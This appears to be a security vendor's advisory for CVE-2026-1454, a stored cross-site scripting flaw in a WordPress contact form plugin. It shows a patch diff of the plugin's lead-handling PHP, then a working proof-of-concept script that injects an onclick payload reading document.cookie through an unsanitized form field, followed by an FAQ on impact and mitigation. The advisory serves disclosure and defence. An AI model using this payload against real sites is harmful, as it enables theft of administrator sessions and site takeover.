+ * Show all Leads column on Lead Page Based on form selection
+ */
+
+function lfb_ShowAllLeadThisForm()
+{
+ if ( ! current_user_can( 'manage_options' ) ) {
+ return false;
+ }
+
+ if ((isset($_POST['form_id']) && ($_POST['form_id'] != '')) || (isset($_GET['form_id']) && ($_GET['form_id'] != ''))) {
+
+ global $wpdb;
+ $table_name = LFB_FORM_DATA_TBL;
+ $th_save_db = new LFB_SAVE_DB($wpdb);
+ $nonce = wp_create_nonce('lfb-nonce-rm');
+ $showLeadsObj = new LFB_Show_Leads();
+ $start = 0;
+ $limit = 10;
+ $detail_view = '';
+ $slectleads = false;
+
+ if (isset($_GET['id'])) {
+ $id = intval($_GET['id']);
+ $start = ($id - 1) * $limit;
+ $form_id = intval($_GET['form_id']);
+ $sn_counter = $start;
+ } else {
+ $id = 1;
+ $form_id = intval($_POST['form_id']);
+ $sn_counter = 0;
+ }
+ if (isset($_GET['detailview'])) {
+ $detail_view = sanitize_text_field($_GET['detailview']);
+ }
+
+ if (isset($_POST['slectleads'])) {
+ $slectleads = sanitize_text_field($_POST['slectleads']);
+ }
+
+ $getArray = $th_save_db->lfb_get_all_view_leads_db($form_id, $start);
+ $posts = $getArray['posts'];
+ $rows = $getArray['rows'];
+ $limit = $getArray['limit'];
+ $fieldData = $getArray['fieldId'];
+ $tableHead = '';
+ $headcount = 1;
+ $leadscount = 5;
+
+ foreach ($fieldData as $fieldkey => $fieldvalue) {
+ // Html Field removed
+ $pos = strpos($fieldkey, 'htmlfield_');
+ if ($pos !== false) {
+ continue;
+ }
+
+ if ($headcount < 6 && $slectleads) {
+ $tableHead .= '<th>' . esc_html($fieldvalue) . '</th>';
+ } elseif (!$slectleads) {
+
+ $tableHead .= '<th>' . esc_html($fieldvalue) . '</th>';
+
+ $leadscount = $headcount;
+ }
+ $fieldIdNew[] = $fieldkey;
+ $headcount++;
+
+ // } else{ break; }
+ }
+
+ if (!empty($posts)) {
+ $entry_counter = 0;
+ $table_body = '';
+ $table_head = '';
+ $popupTab = '';
+
+ if ($headcount >= 6 && $leadscount == 5) {
+ $table_head .= '<th></th><th> . . . </th><th><input type="button" onclick="show_all_leads(' . intval($id) . ',' . intval($form_id) . ')" value="Show all Columns"></th>';
+ }
+
+ foreach ($posts as $results) {
+ $table_row = '';
+ // $table_head = '';
+ $sn_counter++;
+ $row_size_limit = 0;
+ $form_data = $results->form_data;
+ $lead_id = $results->id;
+ $lead_date = date("jS F Y", strtotime($results->date));
+ $form_data = maybe_unserialize($form_data);
+ unset($form_data['hidden_field']);
+ unset($form_data['action']);
+ $entry_counter++;
+ $complete_data = '';
+ $popup_data_val = '';
+ $date_td = '<td><b>' . $lead_date . '</b></td>';
+
+
+ $returnData = $th_save_db->lfb_lead_form_value($form_data, $fieldIdNew, $fieldData, $leadscount);
+ $table_row .= $returnData['table_row'];
+ $table_row .= $date_td;
+
+ foreach ($form_data as $form_data_key => $form_data_value) {
+ $row_size_limit++;
+
+ if (($detail_view != 1) && ($row_size_limit == 6) && $leadscount == 5) {
+ $table_row .= '<td>. . .</td><td><a href="#lf-openModal-' . $lead_id . '" value="view">view</a></td>';
+ }
+ }
+
+ $complete_data .= "<table><tr><th>Field</th><th>Value</th></tr>" . $returnData['table_popup'] . "</table>";
+
+ /****/
+ $popupTab .= '<div id="lf-openModal-' . $lead_id . '" class="lf-modalDialog">
+ <div class="lfb-popup-leads" ><a href="#lf-close" title="Close" class="lf-close">X</a>' . $complete_data . '
+ </div>
+ </div>';
+
+ // $complete_data .=$returnData['table_popup']."</table>";
+
+ $table_body .= '<tbody id="lead-id-' . $lead_id . '">';
+
+ $table_body .= '<tr><td><span class="lead-count">' . $sn_counter . '</span><a class="lead-remove" onclick="delete_this_lead(' . $lead_id . ','' . $nonce . '')" ><i class="fa fa-trash" aria-hidden="true"></i></a></td>' . $table_row . '</tr>';
+ }
+
+ $thHead = '<div class="wrap" id="form-leads-show"><table class="show-leads-table wp-list-table widefat fixed" id="show-leads-table" ><thead><tr><th>Action</th>' . $tableHead . '<th>Date</th>' . $table_head . '</tr></thead>';
+
+ echo wp_kses($thHead . $table_body . '</tbody></table>' . $popupTab, $showLeadsObj->expanded_alowed_tags());
+
+ $total = ceil($rows / $limit);
+ if ($headcount >= 6 && $leadscount == 5) {
+
+ if ($id > 1) {
+ echo "<a href='' onclick='lead_pagi_view(" . intval($id - 1) . "," . intval($form_id) . ")' class='button'><i class='fa fa-chevron-right'></i></a>";
+ }
+ if ($id != $total) {
+ echo "<a href='' onclick='lead_pagi_view(" . intval($id + 1) . "," . intval($form_id) . ")' class='button'><i class='fa fa-chevron-left'></i></a>";
+ }
+ echo "<ul class='page'>";
+ for ($i = 1; $i <= $total; $i++) {
+ if ($i == $id) {
+ echo "<li class='lf-current'><a href='#'>" . intval($i) . "</a></li>";
+ } else {
+ echo "<li><a href='' onclick='lead_pagi_view(" . intval($i) . "," . intval($form_id) . ")'>" . intval($i) . "</a></li>";
+ }
+ }
+ echo '</ul>';
+ } else {
+
+ if ($id > 1) {
+ echo "<a href='' onclick='lead_pagination(" . intval($id - 1) . "," . intval($form_id) . ")' class='button'><i class='fa fa-chevron-right'></i></a>";
+ }
+ if ($id != $total) {
+ echo "<a href='' onclick='lead_pagination(" . intval($id + 1) . "," . intval($form_id) . ")' class='button'><i class='fa fa-chevron-left'></i></a>";
+ }
+ echo "<ul class='page'>";
+ for ($i = 1; $i <= $total; $i++) {
+ if ($i == $id) {
+ echo "<li class='lf-current'><a href='#'>" . intval($i) . "</a></li>";
+ } else {
+ echo "<li><a href='' onclick='lead_pagination(" . intval($i) . "," . intval($form_id) . ")'>" . intval($i) . "</a></li>";
+ }
+ }
+ echo '</ul>';
+ }
+ } else {
+ esc_html_e('Opps No lead...!!', 'lead-form-builder');
+ }
+ die();
+ }
+}
+
+add_action('wp_ajax_ShowAllLeadThisForm', 'lfb_ShowAllLeadThisForm');
+
+
+
+function lfb_ShowLeadPagi()
+{
+ if ( ! current_user_can( 'manage_options' ) ) {
+ return false;
+ }
+
+ if ((isset($_POST['form_id']) && ($_POST['form_id'] != '')) || (isset($_GET['form_id']) && ($_GET['form_id'] != ''))) {
+ global $wpdb;
+ $table_name = LFB_FORM_DATA_TBL;
+ $th_save_db = new LFB_SAVE_DB($wpdb);
+ $showLeadsObj = new LFB_Show_Leads();
+ $nonce = wp_create_nonce('lfb-nonce-rm');
+ $start = 0;
+ $limit = 10;
+ $detail_view = '';
+
+ if (isset($_GET['id'])) {
+ $id = intval($_GET['id']);
+ $start = ($id - 1) * $limit;
+ $form_id = intval($_GET['form_id']);
+ $sn_counter = $start;
+ } else {
+ $id = 1;
+ $form_id = intval($_POST['form_id']);
+ $sn_counter = 0;
+ }
+ if (isset($_GET['detailview'])) {
+ $detail_view = isset($_GET['detailview']);
+ }
+
+ $getArray = $th_save_db->lfb_get_all_view_leads_db($form_id, $start);
+ $posts = $getArray['posts'];
+ $rows = $getArray['rows'];
+ $limit = $getArray['limit'];
+ $fieldData = $getArray['fieldId'];
+ $tableHead = '';
+ $headcount = 1;
+
+ foreach ($fieldData as $fieldkey => $fieldvalue) {
+ if ($headcount < 6) {
+ $tableHead .= '<th>' . esc_html($fieldvalue) . '</th>';
+ }
+ $fieldIdNew[] = $fieldkey;
+ // } else{ break; }
+ $headcount++;
+ }
+ if (!empty($posts)) {
+ $entry_counter = 0;
+ $table_body = '';
+ $table_head = '';
+ $popupTab = '';
+
+ if ($headcount >= 6) {
+ $table_head .= '<th> . . . </th><th><input type="button" onclick="show_all_leads(' . $id . ',' . $form_id . ')" value="Show all Columns"></th>';
+ }
+
+ foreach ($posts as $results) {
+ $table_row = '';
+ $sn_counter++;
+ $row_size_limit = 0;
+ $form_data = $results->form_data;
+ $lead_id = $results->id;
+ $form_data = maybe_unserialize($form_data);
+ unset($form_data['hidden_field']);
+ unset($form_data['action']);
+ $entry_counter++;
+ $complete_data = '';
+ $popup_data_val = '';
+
+ $returnData = $th_save_db->lfb_lead_form_value($form_data, $fieldIdNew, $fieldData, 5);
+ $table_row .= $returnData['table_row'];
+
+ foreach ($form_data as $form_data_key => $form_data_value) {
+ $row_size_limit++;
+
+ if (($detail_view != 1) && ($row_size_limit == 6)) {
+ $table_row .= '<td>. . .</td><td><a href="#lf-openModal-' . $lead_id . '" value="view">view</a></td>';
+ }
+ }
+
+ $complete_data .= "<table><tr><th>Field</th><th>Value</th></tr>" . $returnData['table_popup'] . "</table>";
+
+ /****/
+ $popupTab .= '<div id="lf-openModal-' . $lead_id . '" class="lf-modalDialog">
+ <div class="lfb-popup-leads" ><a href="#lf-close" title="Close" class="lf-close">X</a>' . $complete_data . '
+ </div>
+ </div>';
+ /****/
+ $table_body .= '<tbody id="lead-id-' . $lead_id . '">';
+
+ $table_body .= '<tr><td><span class="lead-count">' . $sn_counter . '</span><a class="lead-remove" onclick="delete_this_lead(' . $lead_id . ','' . $nonce . '')" ><i class="fa fa-trash" aria-hidden="true"></i></a></td>' . $table_row . '</tr>';
+ }
+
+ $thHead = '<div class="wrap" id="form-leads-show"><table class="show-leads-table wp-list-table widefat fixed" id="show-leads-table" ><thead><tr><th>Action</th>' . $tableHead . $table_head . '</tr></thead>';
+
+ echo wp_kses($thHead . $table_body . '</tbody></table>' . $popupTab, $showLeadsObj->expanded_alowed_tags());
+
+ $total = ceil($rows / $limit);
+ if ($id > 1) {
+ echo "<a href='' onclick='lead_pagi_view(" . intval($id - 1) . "," . intval($form_id) . ")' class='button'><i class='fa fa-chevron-right'></i></a>";
+ }
+ if ($id != $total) {
+ echo "<a href='' onclick='lead_pagi_view(" . intval($id + 1) . "," . intval($form_id) . ")' class='button'><i class='fa fa-chevron-left'></i></a>";
+ }
+ echo "<ul class='page'>";
+ for ($i = 1; $i <= $total; $i++) {
+ if ($i == $id) {
+ echo "<li class='lf-current'><a href='#'>" . intval($i) . "</a></li>";
+ } else {
+ echo "<li><a href='' onclick='lead_pagi_view(" . intval($i) . "," . intval($form_id) . ")'>" . intval($i) . "</a></li>";
+ }
+ }
+ echo '</ul>';
+ } else {
+ esc_html_e('Opps No lead...!!', 'lead-form-builder');
+ }
+ die();
+ }
+}
+add_action('wp_ajax_ShowLeadPagi', 'lfb_ShowLeadPagi');
+
+/*
+ * Show Leads on Lead Page Based on form selection
+ */
+
+function lfb_ShowAllLeadThisFormDate()
+{
+
+
+ if ( ! current_user_can( 'manage_options' ) ) {
+ return false;
+ }
+
+
+ if ((isset($_POST['form_id']) && ($_POST['form_id'] != '')) || (isset($_GET['form_id']) && ($_GET['form_id'] != ''))) {
+ global $wpdb;
+ $nonce = wp_create_nonce('lfb-nonce-rm');
+ $table_name = LFB_FORM_DATA_TBL;
+ $th_save_db = new LFB_SAVE_DB($wpdb);
+ $showLeadsObj = new LFB_Show_Leads();
+ $start = 0;
+ $limit = 10;
+ $detail_view = '';
+
+ if (isset($_GET['id'])) {
+ $id = intval($_GET['id']);
+ $datewise = sanitize_text_field($_GET['datewise']);
+ $start = ($id - 1) * $limit;
+ $form_id = intval($_GET['form_id']);
+ $sn_counter = $start;
+ } else {
+ $id = 1;
+ $datewise = '';
+ $sn_counter = 0;
+ }
+ if (isset($_GET['detailview'])) {
+ $detail_view = sanitize_text_field($_GET['detailview']);
+ }
+ $getArray = $th_save_db->lfb_get_all_view_date_leads_db($form_id, $datewise, $start);
+
+ $posts = $getArray['posts'];
+ $rows = $getArray['rows'];
+ $limit = $getArray['limit'];
+ $fieldData = $getArray['fieldId'];
+ $fieldIdNew = array();
+ $headcount = 1;
+
+ $tableHead = '';
+
+
+ foreach ($fieldData as $fieldkey => $fieldvalue) {
+ if ($headcount < 6) {
+ $tableHead .= '<th>' . esc_html($fieldvalue) . '</th>';
+ }
+ $fieldIdNew[] = $fieldkey;
+ // } else{ break; }
+ $headcount++;
+ }
+
+ if (!empty($posts)) {
+ $entry_counter = 0;
+ $value1 = 0;
+ $table_body = '';
+ $table_head = '';
+ $popupTab = '';
+
+
+ if ($headcount >= 6) {
+ $table_head .= '<th><input type="button" onclick="show_all_leads(' . $id . ',' . $form_id . ')" value="Show all fields"></th>';
+ }
+
+ foreach ($posts as $results) {
+ $table_row = '';
+ $sn_counter++;
+ $row_size_limit = 0;
+ $form_data = $results->form_data;
+ $lead_id = $results->id;
+ $form_data = maybe_unserialize($form_data);
+ unset($form_data['hidden_field']);
+ unset($form_data['action']);
+ $entry_counter++;
+ $complete_data = '';
+ $popup_data_val = '';
+
+ $returnData = $th_save_db->lfb_lead_form_value($form_data, $fieldIdNew, $fieldData, 5);
+ $table_row .= $returnData['table_row'];
+
+
+
+ foreach ($form_data as $form_data_key => $form_data_value) {
+ $row_size_limit++;
+
+ if (($detail_view != 1) && ($row_size_limit == 6)) {
+ $table_row .= '<td>. . . . .</td><td><a href="#lf-openModal-' . $lead_id . '" value="view">view</a></td>';
+ }
+ }
+
+ $complete_data .= "<table><tr><th>Field</th><th>Value</th></tr>" . $returnData['table_popup'] . "</table>";
+
+ /****/
+ $popupTab .= '<div id="lf-openModal-' . $lead_id . '" class="lf-modalDialog">
+ <div class="lfb-popup-leads" ><a href="#lf-close" title="Close" class="lf-close">X</a>' . $complete_data . '
+ </div>
+ </div>';
+ /****/
+ $table_body .= '<tbody id="lead-id-' . $lead_id . '">';
+
+ $table_body .= '<tr><td><span class="lead-count">' . $sn_counter . '</span><a class="lead-remove" onclick="delete_this_lead(' . $lead_id . ','' . $nonce . '')" ><i class="fa fa-trash" aria-hidden="true"></i></a></td>' . $table_row . '</tr>';
+ }
+
+ $thHead = '<div class="wrap" id="form-leads-show"><table class="show-leads-table wp-list-table widefat fixed" id="show-leads-table" ><thead><tr><th>Action</th>' . $tableHead . $table_head . '</tr></thead>';
+
+ echo wp_kses($thHead . $table_body . '</tbody></table>' . $popupTab, $showLeadsObj->expanded_alowed_tags());
+
+ $rows = count($rows);
+ $total = ceil($rows / $limit);
+ if ($id > 1) {
+ echo "<a href='' onclick='lead_pagination_datewise(" . intval($id - 1) . "," . intval($form_id) . ","" . esc_attr($datewise) . "");' class='button'><i class='fa fa-chevron-right'></i></a>";
+ }
+ if ($id != $total) {
+ echo "<a href='' onclick='lead_pagination_datewise(" . intval($id + 1) . "," . intval($form_id) . ","" . esc_attr($datewise) . "");' class='button'><i class='fa fa-chevron-left'></i></a>";
+ }
+ echo "<ul class='page'>";
+ for ($i = 1; $i <= $total; $i++) {
+ if ($i == $id) {
+ echo "<li class='lf-current'><a>" . intval($i) . "</a></li>";
+ } else {
+ echo "<li><a href='' onclick='lead_pagination_datewise(" . intval($i) . "," . intval($form_id) . ","" . esc_attr($datewise) . "");'>" . intval($i) . "</a></li>";
+ }
+ }
+ echo '</ul>';
+ } else {
+ esc_html_e('Opps No lead...!!', 'lead-form-builder');
+ }
+ die();
+ }
+}
+add_action('wp_ajax_ShowAllLeadThisFormDate', 'lfb_ShowAllLeadThisFormDate');
+
+/*
+ * Save from Data from front-end
+ */
+
+function lfb_form_name_email_filter($form_data)
+{
+ $name_email = array();
+ $e = false;
+ $n = false;
+ foreach ($form_data as $key => $value) {
+ $email = strpos($key, 'email_');
+ $name = strpos($key, 'name_');
+ if ($email !== false) {
+ $name_email['email'] = $value;
+ $e = true;
+ } elseif ($name !== false) {
+ $name_email['name'] = $value;
+ $n = true;
+ }
+ if ($e === true && $n === true) {
+ break;
+ }
+ }
+ return $name_email;
+}
+
+function lfb_lead_sanitize($leads)
+{
+ if (is_array($leads)) {
+ foreach ($leads as $key => $value) {
+ $rKey = preg_replace("/[^a-zA-Z]+/", "", $key);
+ if ($rKey === 'name' || $rKey === 'text' || $rKey === 'radio' || $rKey === 'option') {
+ $leads[$key] = sanitize_text_field($value);
+ } elseif ($rKey === 'email') {
+ $leads[$key] = sanitize_email($value);
+ } elseif ($rKey === 'number') {
+ $leads[$key] = intval($value);
+ } elseif ($rKey === 'message' || $rKey === 'textarea') {
+ $leads[$key] = sanitize_textarea_field($value);
+ } elseif ($rKey === 'date' || $rKey === 'dob') {
+ $leads[$key] = sanitize_text_field($value);
+ } elseif ($rKey === 'url') {
+ $leads[$key] = esc_url_raw($value);
+ } elseif ($rKey === 'checkbox') {
+
+ foreach ($value as $ckey => $cvalue) {
+ $value[$ckey] = sanitize_text_field($cvalue);
+ }
+ $leads[$key] = $value;
+ } else {
+ // Catch-all: sanitize any unrecognized field types (including htmlfield_*)
+ if (is_array($value)) {
+ foreach ($value as $ckey => $cvalue) {
+ $value[$ckey] = sanitize_text_field($cvalue);
+ }
+ $leads[$key] = $value;
+ } else {
+ $leads[$key] = sanitize_text_field($value);
+ }
+ }
+ } // end foreach
+
+ return $leads;
+ }
+}
+
+function lfb_Save_Form_Data()
+{
+
+ if (isset($_POST['fdata']) && wp_verify_nonce($_POST['_wpnonce'], 'lfb_front_nonce' )) {
+ wp_parse_str($_POST['fdata'], $fromData);
+
+ $form_id = intval($fromData['hidden_field']);
+ unset($fromData['g-recaptcha-response']);
+ unset($fromData['action']);
+ unset($fromData['hidden_field']);
+
+ $en = lfb_form_name_email_filter($fromData);
+
+
+ if ((isset($en['email'])) && ($en['email'] != '')) {
+ $user_emailid = sanitize_email($en['email']);
+ } else {
+ $user_emailid = esc_html__('invalid_email', 'lead-form-builder');
+ }
+ $sanitize_leads = lfb_lead_sanitize($fromData);
+ $form_data = maybe_serialize($sanitize_leads);
+
+ $lf_store = new LFB_LeadStoreType();
+ $th_save_db = new LFB_SAVE_DB();
+
+ $lf_store->lfb_mail_type($form_id, $form_data, $th_save_db, $user_emailid);
+ }else{
+ echo esc_html__('INVAILD','lead-form-builder');
+ }
+ die();
+}
+
+add_action('wp_ajax_Save_Form_Data', 'lfb_Save_Form_Data');
+add_action('wp_ajax_nopriv_Save_Form_Data', 'lfb_Save_Form_Data');
+
+function lfb_verifyFormCaptcha()
+{
+ if ((isset($_POST['captcha_res'])) && (!empty($_POST['captcha_res']))) {
+ $captcha = stripslashes($_POST['captcha_res']);
+ $secret_key = get_option('captcha-setting-secret');
+ $response = wp_remote_post(
+ 'https://www.google.com/recaptcha/api/siteverify',
+ array(
+ 'method' => 'POST',
+ 'body' => array(
+ 'secret' => $secret_key,
+ 'response' => $captcha
+ )
+ )
+ );
+ $reply_obj = json_decode(wp_remote_retrieve_body($response));
+ if (isset($reply_obj->success) && $reply_obj->success == 1) {
+ esc_html_e('Yes', 'lead-form-builder');
+ } else {
+ esc_html_e('No', 'lead-form-builder');
+ }
+ } else {
+ esc_html_e('Invalid', 'lead-form-builder');
+ }
+ die();
+}
+add_action('wp_ajax_verifyFormCaptcha', 'lfb_verifyFormCaptcha');
+add_action('wp_ajax_nopriv_verifyFormCaptcha', 'lfb_verifyFormCaptcha');
+
+function lfb_RememberMeThisForm()
+{
+ $nonce = $_POST['rem_nonce'];
+
+ if (isset($_POST['form_id']) && current_user_can('manage_options') && wp_verify_nonce($nonce, 'rem-nonce')) {
+
+ $remember_me = intval($_POST['form_id']);
+ if (get_option('lf-remember-me-show-lead') !== false) {
+ update_option('lf-remember-me-show-lead', $remember_me);
+ } else {
+ add_option('lf-remember-me-show-lead', $remember_me);
+ }
+ echo esc_html(get_option('lf-remember-me-show-lead'));
+ die();
+ }
+}
+add_action('wp_ajax_RememberMeThisForm', 'lfb_RememberMeThisForm');
+
+
+/*
+ * Save Email Settings
+ */
+
+
+
+function lfb_emailsettings_sanitize($email_settings)
+{
+
+ $email_settings['from'] = sanitize_email($email_settings['from']);
+ $email_settings['header'] = sanitize_text_field($email_settings['header']);
+ $email_settings['subject'] = sanitize_text_field($email_settings['subject']);
+ $email_settings['message'] = sanitize_textarea_field($email_settings['message']);
+ $email_settings['user-email-setting-option'] = sanitize_text_field($email_settings['user-email-setting-option']);
+ $email_settings['form-id'] = intval($email_settings['form-id']);
+ return $email_settings;
+}
+
+function lfb_SaveUserEmailSettings()
+{
+ unset($_POST['action']);
+ $mailArr = array();
+
+ $nonce = $_REQUEST['ues_nonce'];
+ // Get all the user roles as an array.
+ if (isset($_POST['user_email_setting']) && current_user_can('manage_options') && wp_verify_nonce($nonce, 'ues-nonce')) {
+
+ $mailArr['user_email_setting'] = lfb_emailsettings_sanitize($_POST['user_email_setting']);
+
+ $email_setting = maybe_serialize($mailArr);
+ $this_form_id = intval($_POST['user_email_setting']['form-id']);
+ global $wpdb;
+ $table_name = LFB_FORM_FIELD_TBL;
+ $update_query = "update " . LFB_FORM_FIELD_TBL . " set usermail_setting='" . $email_setting . "' where id='" . $this_form_id . "'";
+ $th_save_db = new LFB_SAVE_DB($wpdb);
+ $update_leads = $th_save_db->lfb_update_form_data($update_query);
+ if ($update_leads) {
+ echo esc_html("updated");
+ }
+ }
+ die();
+}
+add_action('wp_ajax_SaveUserEmailSettings', 'lfb_SaveUserEmailSettings');
--- a/lead-form-builder/inc/lf-db.php
+++ b/lead-form-builder/inc/lf-db.php
@@ -1,409 +1,409 @@
-<?php
-if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
-
-if (!function_exists('lfb_plugin_activate')) {
-
- function lfb_plugin_activate() {
- $default_form = 0;
- global $wpdb;
- $lead_form = $wpdb->prefix . 'lead_form';
- $lead_form_data = $wpdb->prefix . 'lead_form_data';
- $lead_form_extension = $wpdb->prefix . 'lead_form_extension';
- $lead_form_options = $wpdb->prefix . 'lead_form_options';
- $charset_collate = $wpdb->get_charset_collate();
- if ($wpdb->get_var("SHOW TABLES LIKE '$lead_form'") != $lead_form) {
- $sql = "CREATE TABLE $lead_form (
- id INT(10) NOT NULL AUTO_INCREMENT,
- form_title VARCHAR(255) NOT NULL,
- form_data text NOT NULL,
- date datetime NOT NULL,
- mail_setting text NOT NULL,
- usermail_setting text NOT NULL,
- multiData text NOT NULL,
- form_skin VARCHAR(255) DEFAULT 'default' NOT NULL,
- form_status VARCHAR(50) DEFAULT 'ACTIVE' NOT NULL,
- captcha_status VARCHAR(255) DEFAULT 'OFF' NOT NULL,
- Proof of Concept (PHP)
NOTICE :
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1454 - Responsive Contact Form Builder & Lead Generation Plugin <= 2.0.1 - Unauthenticated Stored Cross-Site Scripting
<?php
$target_url = 'http://vulnerable-wordpress-site.com';
// Step 1: Identify a form ID
// This PoC assumes form ID 1 exists. In real scenarios, enumerate via exposed forms.
$form_id = 1;
// Step 2: Craft malicious payload
// The payload uses an anchor tag with onclick attribute allowed by the vulnerable wp_kses filter
$payload = '<a href="#" onclick="alert(document.cookie)">Click Me</a>';
// Step 3: Construct POST data
// The field name must NOT match the whitelisted patterns in lfb_lead_sanitize()
// Using 'customfield_' prefix bypasses the original sanitization
$post_data = array(
'action' => 'Save_Form_Data',
'_wpnonce' => 'dummy_nonce', // Nonce validation occurs but can be obtained from frontend
'fdata' => http_build_query(array(
'hidden_field' => $form_id,
'customfield_1' => $payload, // This field type bypasses sanitization
'g-recaptcha-response' => '', // Empty if captcha disabled
'action' => 'Save_Form_Data'
))
);
// Step 4: Send exploit request to admin-ajax.php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// Step 5: Check response
if ($http_code == 200 && strpos($response, 'INVAILD') === false) {
echo "[+] Payload likely injected successfully.n";
echo "[+] Visit $target_url/wp-admin/admin.php?page=all-leads to trigger XSS.n";
} else {
echo "[-] Injection may have failed. Response: $responsen";
}
?>Frequently Asked Questions
What is CVE-2026-1454?
Understanding the vulnerabilityCVE-2026-1454 is a high-severity vulnerability in the Responsive Contact Form Builder & Lead Generation Plugin for WordPress. It allows unauthenticated stored cross-site scripting (XSS) via form field submissions due to insufficient input sanitization.
How does this vulnerability work?
Mechanism of exploitationThe vulnerability arises from the lfb_lead_sanitize() function, which does not sanitize certain field types. Attackers can submit malicious scripts through these fields, which are then stored in the database and executed when an administrator views the lead entries.
Who is affected by this vulnerability?
Identifying impacted usersAny WordPress site using the Responsive Contact Form Builder & Lead Generation Plugin version 2.0.1 or earlier is vulnerable. Administrators should check their plugin version to assess exposure.
How can I check if my site is vulnerable?
Version verification stepsTo check if your site is vulnerable, navigate to the plugins section in your WordPress dashboard. Look for the Responsive Contact Form Builder & Lead Generation Plugin and verify if the version is 2.0.1 or earlier.
How can I fix this vulnerability?
Steps to mitigate the issueThe vulnerability is fixed in version 2.0.3 of the plugin. Update the plugin to the latest version to ensure that all sanitization issues are addressed and the risk of exploitation is eliminated.
What if I cannot update the plugin immediately?
Temporary mitigation strategiesIf an immediate update is not possible, consider disabling the plugin until you can apply the patch. Additionally, review user permissions to limit access to the admin dashboard.
What does the CVSS score of 7.2 indicate?
Understanding severity ratingsA CVSS score of 7.2 indicates a high severity level, suggesting that the vulnerability poses a significant risk to affected systems. It is advisable to prioritize remediation to protect against potential exploitation.
What are the practical risks of this vulnerability?
Potential impacts on your siteExploitation of this vulnerability can lead to unauthorized script execution in the context of an administrator’s session. This could allow attackers to perform actions such as data theft, site defacement, or even complete site takeover.
How does the proof of concept demonstrate the vulnerability?
Exploit demonstration detailsThe proof of concept illustrates how an attacker can submit a malicious payload using a form field that bypasses sanitization. It shows how the payload is executed when an administrator views the lead entries, confirming the stored XSS vulnerability.
What are the recommended best practices for plugin security?
Enhancing overall WordPress securityRegularly update plugins and themes, use security plugins to monitor for vulnerabilities, and perform routine security audits. Additionally, implement least privilege access controls for user roles to minimize risk.
Is there a way to report vulnerabilities I find?
Responsible disclosureIf you discover vulnerabilities, it is best practice to report them directly to the plugin developers or through a responsible disclosure platform. This helps ensure that issues are addressed promptly and securely.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
Trusted by Developers & Organizations
